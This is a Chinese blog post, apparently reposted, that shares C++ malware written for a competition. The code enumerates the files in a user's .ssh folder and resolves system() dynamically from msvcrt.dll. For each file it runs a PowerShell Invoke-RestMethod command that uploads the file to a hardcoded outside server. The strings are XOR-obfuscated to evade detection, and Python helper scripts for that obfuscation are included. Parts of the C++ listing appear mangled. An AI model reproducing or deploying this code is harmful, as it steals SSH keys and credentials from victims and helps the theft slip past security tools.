本文共 3448 字,大约阅读时间需要 11 分钟。
上周写的一个恶意代码片段,功能为:
C++实现读取"C:\Users\thinkycx\.ssh\"目录下所有文件(不包括子文件夹),使用getProcessAddress获取system函数地址,动态调用system执行命令:powershell上传文件。
测试powershell功能用的上传命令,注意powershell代码中的\"代表转义的"。
powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\known_hosts\""
由于比赛的要求,对字符串做了简单的异或混淆。
服务端recvpost.php脚本:
C++实现代码:
#include #include #include #include #include #include using namespace std;int main(){ DIR *dir; struct dirent *ptr; typedef void (WINAPI *PGNSI)(char *); //powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\known_hosts\"" char cmdline[0x100]="\x1d\x2\x1a\x8\x1f\x1e\x5\x8\x1\x1\x4d\x4f\x24\x3\x1b\x2\x6\x8\x40\x3f\x8\x1e\x19\x20\x8\x19\x5\x2\x9\x4d\x40\x38\x1f\x4\x4d\x31\x4f\x5\x19\x19\x1d\x57\x42\x42\x59\x58\x43\x5e\x5f\x43\x5b\x5b\x43\x5c\x59\x5e\x57\x55\x5d\x5d\x5c\x42\x1f\x8\xe\x1b\x1d\x2\x1e\x19\x43\x1d\x5\x1d\x31\x4f\x4d\x40\x20\x8\x19\x5\x2\x9\x4d\x3d\x2\x1e\x19\x4d\x40\x24\x3\x2b\x4\x1\x8\x4d\x31\x4f\x2e\x57\x31\x38\x1e\x8\x1f\x1e\x31\x19\x5\x4\x3\x6\x14\xe\x15\x31\x43\x1e\x1e\x5\x31";//"\x70\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x20\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x52\x65\x73\x74\x4d\x65\x74\x68\x6f\x64\x20\x2d\x55\x72\x69\x20\x5c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x34\x35\x2e\x33\x32\x2e\x36\x36\x2e\x31\x34\x33\x3a\x38\x30\x30\x31\x2f\x72\x65\x63\x76\x70\x6f\x73\x74\x2e\x70\x68\x70\x5c\x22\x20\x2d\x4d\x65\x74\x68\x6f\x64\x20\x50\x6f\x73\x74\x20\x2d\x49\x6e\x46\x69\x6c\x65\x20\x5c\x22\x43\x3a\x5c\x55\x73\x65\x72\x73\x5c\x74\x68\x69\x6e\x6b\x79\x63\x78\x5c\x2e\x73\x73\x68\x5c"; char cmdline_end[4] = "\x4d\x33\x33"; //0x11 \x5c\x22\x22"; char foldername[100] = "\x50\x29\x3c\x46\x60\x76\x61\x60\x3c\x67\x7b\x7a\x7d\x78\x6a\x70\x6b\x3c\x3d\x60\x60\x7b\x3c"; // 0x13 "\x43\x3a\x2f\x55\x73\x65\x72\x73\x2f\x74\x68\x69\x6e\x6b\x79\x63\x78\x2f\x2e\x73\x73\x68\x2f"; char msvcrtdll[11] = "\x2e\x30\x35\x20\x31\x37\x6d\x27\x2f\x2f"; //"msvcrt.dll"; char funcname[7] = "\x64\x6e\x64\x63\x72\x7a"; //"system"; char payload[0x200]={0}; int sizeall; sizeall = strlen(cmdline); for(int i=0; i d_name,".") || !strcmp(ptr->d_name,"..")){ continue; } sprintf(payload,"%s%s%s", cmdline, ptr->d_name,cmdline_end ); pGNSI(payload); } } return 0;}
补充一下字符串转换脚本
字符串转化成"\xAB\xCD"形式:
#!/usr/bin/env python# coding=utf-8a = r'powershell "Invoke-RestMethod -Uri \"http://45.32.66.143:8001/recvpost.php\" -Method Post -InFile \"C:\Users\thinkycx\.ssh\\'a = r'C:/Users/thinkycx/.ssh/';str = ''for i in a: str += "\\x%2x"% ord(i)print str
"\xAB\xCD"和key异或一下输出:
#!/usr/bin/env python# coding=utf-8a = "\x5c\x22\x22"a = "\x43\x3a\x2f\x55\x73\x65\x72\x73\x2f\x74\x68\x69\x6e\x6b\x79\x63\x78\x2f\x2e\x73\x73\x68\x2f"a = "msvcrt.dll"a = "system";a = "\x70\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x20\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x52\x65\x73\x74\x4d\x65\x74\x68\x6f\x64\x20\x2d\x55\x72\x69\x20\x5c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x34\x35\x2e\x33\x32\x2e\x36\x36\x2e\x31\x34\x33\x3a\x38\x30\x30\x31\x2f\x72\x65\x63\x76\x70\x6f\x73\x74\x2e\x70\x68\x70\x5c\x22\x20\x2d\x4d\x65\x74\x68\x6f\x64\x20\x50\x6f\x73\x74\x20\x2d\x49\x6e\x46\x69\x6c\x65\x20\x5c\x22\x43\x3a\x5c\x55\x73\x65\x72\x73\x5c\x74\x68\x69\x6e\x6b\x79\x63\x78\x5c\x2e\x73\x73\x68\x5c"print len(a)str1 = ''for i in a: c = ord(i) ^ 0x6d str1 += "\\x%x"% cprint str1
转载地址:http://ghmli.baihongyu.com/